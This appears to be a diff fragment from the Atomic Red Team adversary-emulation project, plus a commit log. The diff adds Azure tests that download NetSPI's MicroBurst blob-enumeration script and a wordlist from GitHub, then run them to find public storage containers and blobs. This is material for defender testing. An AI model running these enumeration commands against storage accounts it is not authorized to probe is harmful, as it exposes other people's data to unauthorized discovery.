+      "Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
+    cleanup_command: |
+      remove-item #{output_file} -erroraction silentlycontinue
+    name: powershell
+- name: Azure - Enumerate Azure Blobs with MicroBurst
+  auto_generated_guid: 3dab4bcc-667f-4459-aea7-4162dd2d6590
+  description: |
+    Upon successful execution, this test will utilize a wordlist to enumerate the public facing containers and blobs of a specified Azure storage account. 
+    See https://www.netspi.com/blog/technical/cloud-penetration-testing/anonymously-enumerating-azure-file-resources/ . 
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    base:
+      description: Azure blob keyword to enumerate (Example, storage account name)
+      type: string
+      default: secure
+    output_file:
+      description: File to output results to
+      type: string
+      default: $env:temp\T1619Test1.txt
+    wordlist:
+      description: File path to keywords for search permutations
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\permutations.txt
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      The Invoke-EnumerateAzureBlobs module must exist in PathToAtomicsFolder\..\ExternalPayloads.
+    prereq_command: |
+      if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"){exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/Invoke-EnumerateAzureBlobs.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
+  - description: |
+      The wordlist file for search permutations must exist in PathToAtomicsFolder\..\ExternalPayloads.
+    prereq_command: |
+      if (test-path "#{wordlist}"){exit 0} else {exit 1}
+    get_prereq_command: |
+      invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/156c4e9f4253b482b2b68eda4651116b9f0f2e17/Misc/permutations.txt" -outfile "#{wordlist}"
+  executor:
+    command: |
+      import-module "PathToAtomicsFolder\..\ExternalPayloads\Invoke-EnumerateAzureBlobs.ps1"
+      Invoke-EnumerateAzureBlobs -base #{base} -permutations "#{wordlist}" -outputfile "#{output_file}"
+    cleanup_command: |
+      remove-item #{output_file} -erroraction silentlycontinue
+    name: powershell
@@ -1755,3 +1755,15 @@ a3c09662-85bb-4ea8-b15b-6dc8a844e236
 89e69b4b-3458-4ec6-b819-b3008debc1bc
 e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d
 1174b5df-2c33-490f-8854-f5eb80c907ca
+7693ccaa-8d64-4043-92a5-a2eb70359535
+b404caaa-12ce-43c7-9214-62a531c044f7
+05e8942e-f04f-460a-b560-f7781257feec
+825ba8ca-71cc-436b-b1dd-ea0d5e109086
+03ae82a6-9fa0-465b-91df-124d8ca5c4e8
+d2a1f4bc-a064-4223-8281-a086dce5423c
+0eeb68ce-e64c-4420-8d53-ad5bdc6f86d5
+361fe49d-0c19-46ec-a483-ccb92d38e88e
+210be7ea-d841-40ec-b3e1-ff610bb62744
+cbb2573a-a6ad-4c87-aef8-6e175598559b
+ac333fe1-ce2b-400b-a117-538634427439
+6e76f56f-2373-4a6c-a63f-98b7b72761f1
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Hare Sudhan	ee1ca4fb89	fix elevation_required	2025-10-04 14:15:01 -04:00
dependabot[bot]	90b0b774b9	Bump actions/stale from 9 to 10 (#3178 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-10-04 14:10:30 -04:00
Atomic Red Team doc generator	149e41f748	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-04 18:08:25 +00:00
Milad Cheraghi	b41248c790	kill all processes with Send a SIGTERM (#3173 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-10-04 14:07:20 -04:00
Atomic Red Team doc generator	ee95152c22	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-04 18:02:43 +00:00
ohadm-cynet	be0b138294	Update T1491.001.yaml - move dependency_executor_name to test root level (#3189 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-10-04 14:01:27 -04:00
Atomic Red Team doc generator	0f41fdc8d4	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-04 18:00:06 +00:00
Milad Cheraghi	c87eab6a23	disable ASLR protection via sysctl (#3192 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-10-04 13:59:06 -04:00
dependabot[bot]	0fe201b898	Bump typer from 0.17.3 to 0.19.2 (#3194 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-10-04 13:52:09 -04:00
dependabot[bot]	b5c2b8f422	Bump pyyaml from 6.0.2 to 6.0.3 (#3195 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-10-03 22:52:07 -04:00
Atomic Red Team doc generator	812ad23b22	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-02 20:55:47 +00:00
wikijm	aecf7ddca9	Update T1562.001.yaml - Adding Atomic Test - Freeze PPL-protected process with EDR-Freeze (#3191 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-10-02 13:54:47 -07:00
Atomic Red Team doc generator	07affd5c64	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-01 19:41:26 +00:00
Casey Hennings	eabf4e722d	T1546.008 - Atomic Test Proposal (#3183 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-10-01 12:40:19 -07:00
Atomic Red Team doc generator	a4bf8b76bd	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-01 18:32:44 +00:00
Milad Cheraghi	86a5c2faa0	Identifying Network Shares - Linux (#3197 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-10-01 11:31:44 -07:00
Atomic Red Team doc generator	92bf9b4130	Generated docs from job=generate-docs branch=master [ci skip]	2025-10-01 17:22:43 +00:00
Simon Maréchal	8669f17027	fix(atomics): Fix T1562.008-8 - add region in aws CLI call (#3198 )	2025-10-01 10:21:41 -07:00
Atomic Red Team doc generator	1c32e5d6c7	Generated docs from job=generate-docs branch=master [ci skip]	2025-09-26 17:21:23 +00:00
Michael Haag	d641158872	Expand MakeCab (#3186 )	2025-09-26 13:20:21 -04:00
Atomic Red Team doc generator	35b3e57830	Generated docs from job=generate-docs branch=master [ci skip]	2025-09-19 22:18:40 +00:00
Bakeneko	b6508a417b	Update T1491.001.yaml (#3184 )	2025-09-19 15:17:17 -07:00
dependabot[bot]	005406da76	Bump actions/github-script from 7 to 8 (#3176 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-09-08 13:40:04 -04:00
dependabot[bot]	e8b350371d	Bump actions/setup-python from 5 to 6 (#3177 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-09-08 13:37:25 -04:00
Atomic Red Team doc generator	c79bb6c63b	Generated docs from job=generate-docs branch=master [ci skip]	2025-09-05 10:52:40 +00:00
Hare Sudhan	23d78e9c2c	Updating Windows reviewers list (#3165 )	2025-09-05 04:51:14 -06:00
dependabot[bot]	a0b3572154	Bump typer from 0.16.0 to 0.17.3 (#3175 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-09-02 12:34:31 -04:00
dependabot[bot]	e61360207a	Bump jsonschema from 4.25.0 to 4.25.1 (#3168 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-09-02 12:32:06 -04:00
Atomic Red Team doc generator	cf673d487f	Generated docs from job=generate-docs branch=master [ci skip]	2025-09-02 16:08:20 +00:00
Always in the Cage	2b8c6b4ce4	fix(T1082): define $S3cur3Th1sSh1t_repo for multiple WinPwn tests (14-23) (#3166 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-09-02 12:07:15 -04:00
dependabot[bot]	93de16af70	Bump actions/checkout from 4 to 5 (#3167 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-09-02 12:03:39 -04:00
Atomic Red Team doc generator	f745504cf0	Generated docs from job=generate-docs branch=master [ci skip]	2025-08-24 01:18:38 +00:00
Milad Cheraghi	8f75aa9848	abuse of Linux Magic System Request Key for reboot (#3157 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-08-23 21:17:40 -04:00
Atomic Red Team doc generator	2b81f68a5c	Generated docs from job=generate-docs branch=master [ci skip]	2025-08-21 02:55:29 +00:00
Always in the Cage	095f02e89a	Fix T1123: Replace deprecated audio module with AudioDeviceCmdlets (#3164 ) Co-authored-by: Carrie Roberts <clr2of8@gmail.com>	2025-08-20 20:54:26 -06:00
Atomic Red Team doc generator	ad700ef5ee	Generated docs from job=generate-docs branch=master [ci skip]	2025-08-21 02:34:45 +00:00
Furkan Celik	39daa38e2d	Added T1036.005 test: Masquerading cmd.exe as VSDetector.exe by Furka… (#3159 ) Co-authored-by: Carrie Roberts <clr2of8@gmail.com>	2025-08-20 20:33:22 -06:00
dependabot[bot]	dffd968292	Bump hypothesis from 6.136.8 to 6.137.2 (#3162 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-08-12 13:55:34 -07:00
Atomic Red Team doc generator	77ef76acf3	Generated docs from job=generate-docs branch=master [ci skip]	2025-08-12 01:06:10 +00:00
Casey Hennings	c1705f86e3	Update T1546.008.yaml (#3136 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-08-11 18:05:08 -07:00
Atomic Red Team doc generator	b49c4bbf7e	Generated docs from job=generate-docs branch=master [ci skip]	2025-08-12 00:55:20 +00:00
itsmeLevan	58ff536735	Update T1560.001.yaml (#3132 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-08-11 17:54:19 -07:00
dependabot[bot]	69425eec3c	Bump jsonschema from 4.24.0 to 4.25.0 (#3161 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-08-04 23:55:33 -04:00
dependabot[bot]	fc0c7153d8	Bump hypothesis from 6.135.32 to 6.136.8 (#3160 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-08-04 23:38:54 -04:00
dependabot[bot]	cc187d8777	Bump hypothesis from 6.135.14 to 6.135.29 (#3150 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-07-21 21:11:33 -04:00
Atomic Red Team doc generator	b49c2a0d70	Generated docs from job=generate-docs branch=master [ci skip]	2025-07-21 21:29:47 +00:00
koyoresearch	b755908468	Add atomic test "Decrypt to file" to T1027.013.yaml (#3152 ) Co-authored-by: Carrie Roberts <clr2of8@gmail.com>	2025-07-21 15:28:46 -06:00
Atomic Red Team doc generator	a126a1898a	Generated docs from job=generate-docs branch=master [ci skip]	2025-07-18 13:21:31 +00:00
PhyoPaingHtun ChiLai	858a035852	Update T1204.002.yaml (#3151 ) Co-authored-by: Carrie Roberts <clr2of8@gmail.com>	2025-07-18 07:20:35 -06:00
Atomic Red Team doc generator	c8acf08cff	Generated docs from job=generate-docs branch=master [ci skip]	2025-07-17 23:24:02 +00:00
koyoresearch	ab7835d634	Create t1027.013_encoded_file.yaml (#3148 ) Co-authored-by: Carrie Roberts <clr2of8@gmail.com>	2025-07-17 17:23:03 -06:00
Atomic Red Team doc generator	3aaf3364aa	Generated docs from job=generate-docs branch=master [ci skip]	2025-07-17 22:30:09 +00:00
Mattis	b0b572815d	T1055.012 Process Hollowing using PowerShell - Add prerequisite check and installation commands (#3127 ) Co-authored-by: Mattis Swannet <mattis.swannet@nynox.eu> Co-authored-by: Hare Sudhan <code@0x6c.dev> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>	2025-07-17 16:29:13 -06:00
Atomic Red Team doc generator	a6ec993396	Generated docs from job=generate-docs branch=master [ci skip]	2025-07-17 16:52:39 +00:00
Retrospected	7d68f07d75	Update T1547.001.yaml (#3147 )	2025-07-17 09:51:20 -07:00
Atomic Red Team doc generator	b149dc4549	Generated docs from job=generate-docs branch=master [ci skip]	2025-07-09 23:32:12 +00:00
Manuel Kuß	c33c235b53	Moved two atomics from T1550.001 to T1528 (#3142 ) Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-07-09 16:30:44 -07:00
Atomic Red Team doc generator	70921eb1bb	Generated docs from job=generate-docs branch=master [ci skip]	2025-06-26 18:40:27 +00:00
Manuel Kuß	8bf3f4d377	Moved 'Azure - Scan for Anonymous Access to Azure Storage (Powershell)' from T1530 to T1619 (#3121 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-06-26 11:39:30 -07:00
dependabot[bot]	08b3e7dc9a	Bump urllib3 from 2.2.2 to 2.5.0 (#3137 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-06-24 22:20:11 -04:00
dependabot[bot]	ea4796381a	Bump pytest from 8.4.0 to 8.4.1 (#3140 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-06-24 22:19:14 -04:00
Atomic Red Team doc generator	9f2cd5e9c6	Generated docs from job=generate-docs branch=master [ci skip]	2025-06-24 01:10:01 +00:00
Mattis	3dc4cebb27	T1543.003 Modify Fax Service to run PowerShell - Added input arguments (#3126 ) Co-authored-by: Mattis Swannet <mattis.swannet@nynox.eu> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-06-23 18:09:10 -07:00
Atomic Red Team doc generator	9a10dde8f9	Generated docs from job=generate-docs branch=master [ci skip]	2025-06-24 01:06:27 +00:00
Manuel Kuß	0514a575f5	Moved 'Azure - Enumerate Azure Blobs with MicroBurst' from T1530 to T1619 (#3120 ) Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-06-23 18:05:28 -07:00
dependabot[bot]	f287a94d23	Bump hypothesis from 6.135.9 to 6.135.14 (#3141 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Hare Sudhan <code@0x6c.dev>	2025-06-23 17:12:47 -04:00
Atomic Red Team doc generator	097ca22bbe	Generated docs from job=generate-docs branch=master [ci skip]	2025-06-23 16:40:01 +00:00
Manuel Kuß	17b5e21dc2	Moved 'Azure - Dump All Azure Key Vaults with Microburst' from T1528 to T1555.006 (#3119 ) Co-authored-by: Hare Sudhan <code@0x6c.dev> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-06-23 09:39:03 -07:00
Atomic Red Team doc generator	f13c658342	Generated docs from job=generate-docs branch=master [ci skip]	2025-06-23 16:16:00 +00:00
Seth Cahalan	88e46831fc	1069.002-3 spelling and syntax corrections (#3110 ) Co-authored-by: Hare Sudhan <code@0x6c.dev> Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>	2025-06-23 09:15:09 -07:00
dependabot[bot]	1534ede36d	Bump pydantic from 2.11.5 to 2.11.7 (#3135 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-06-18 11:31:32 -04:00
dependabot[bot]	7fa5149925	Bump ruamel-yaml from 0.18.11 to 0.18.14 (#3128 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-06-15 14:09:35 -04:00
dependabot[bot]	dbe18a6574	Bump pytest from 8.3.5 to 8.4.0 (#3129 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-06-15 14:06:27 -04:00
dependabot[bot]	65cc329c3c	Bump hypothesis from 6.133.0 to 6.135.4 (#3130 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-06-15 14:03:37 -04:00
dependabot[bot]	ed6dd8eaff	Bump jsonschema from 4.23.0 to 4.24.0 (#3122 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-06-14 23:40:39 -04:00
dependabot[bot]	2116bf0490	Bump requests from 2.32.3 to 2.32.4 (#3131 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-06-12 17:21:14 -04:00
dependabot[bot]	eec43d0aff	Bump typer from 0.15.4 to 0.16.0 (#3124 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-06-07 11:04:01 -04:00
dependabot[bot]	8e0ccb2620	Bump hypothesis from 6.131.32 to 6.133.0 (#3125 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-06-04 22:43:58 -04:00
dependabot[bot]	c4097dc7ed	Bump hypothesis from 6.131.9 to 6.131.28 (#3117 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-05-31 10:54:24 -04:00
dependabot[bot]	c03cd8e088	Bump pydantic from 2.11.4 to 2.11.5 (#3116 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-05-31 10:42:11 -04:00
dependabot[bot]	aa7e5d0cce	Bump ruamel-yaml from 0.18.10 to 0.18.11 (#3118 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-05-31 10:38:57 -04:00
dependabot[bot]	633de16098	Bump typer from 0.15.2 to 0.15.4 (#3115 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-05-25 01:06:49 -04:00
dependabot[bot]	5a14ae7539	Bump pydantic from 2.11.3 to 2.11.4 (#3112 ) Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>	2025-05-22 00:21:54 -04:00